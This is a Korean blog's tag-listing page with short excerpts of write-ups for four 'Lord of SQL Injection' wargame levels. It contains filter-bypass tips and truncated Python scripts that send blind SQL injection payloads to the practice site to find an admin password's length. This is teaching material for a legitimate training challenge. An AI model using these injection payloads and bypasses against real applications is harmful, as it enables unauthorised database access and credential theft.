'Los' 태그의 글 목록 (8 Page)

Web Hacking/LOS

Lord of SQL Injection(LOS) - troll

2021.08.07

MySQL에서 테이블을 생성할 때 id 를 단순하게 'varchar' 로 선언했다면 id를 검색할 적에 대소문자를 구별하지 않는다. 이를 이용하여 문자열 필터링을 우회할 수 있다. Tastes good.

Web Hacking/LOS

Lord of SQL Injection(LOS) - orge

2021.08.07

import requests requests.packages.urllib3.disable_warnings() org_url = "https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php" header = {'Cookie': 'PHPSESSID='} session = requests.session() # Check Length of PW for i in range(0, 100): payload = "?pw=ABCD' || id='admin' %26%26 length(pw)=" + "'" + str(i) res = session.get(url = org_url + payload, headers=header, verify=False) if "..

Web Hacking/LOS

Lord of SQL Injection(LOS) - darkelf

2021.08.07

간단하게 id를 admin으로 맞추는 대신에 or 와 and 라는 문자열을 필터링하는 문제이다. MySQL에서 or 는 '||'로, and 는 '&&'로 치환하면 된다.

Web Hacking/LOS

Lord of SQL Injection(LOS) - wolfman

2021.08.07

import requests requests.packages.urllib3.disable_warnings() org_url = "https://los.rubiya.kr/chall/wolfman_4fdc56b75971e41981e3d1e2fbe9b7f7.php" header = {'Cookie': 'PHPSESSID='} session = requests.session() # Check Length of PW for i in range(0, 100): payload = "?pw=ABCD'%09or%09id='admin'%09and%09length(pw)=" + "'" + str(i) res = session.get(url = org_url + payload, headers=header, verify=Fal..

Lord of SQL Injection(LOS) - troll

Lord of SQL Injection(LOS) - orge

Lord of SQL Injection(LOS) - darkelf

Lord of SQL Injection(LOS) - wolfman

티스토리툴바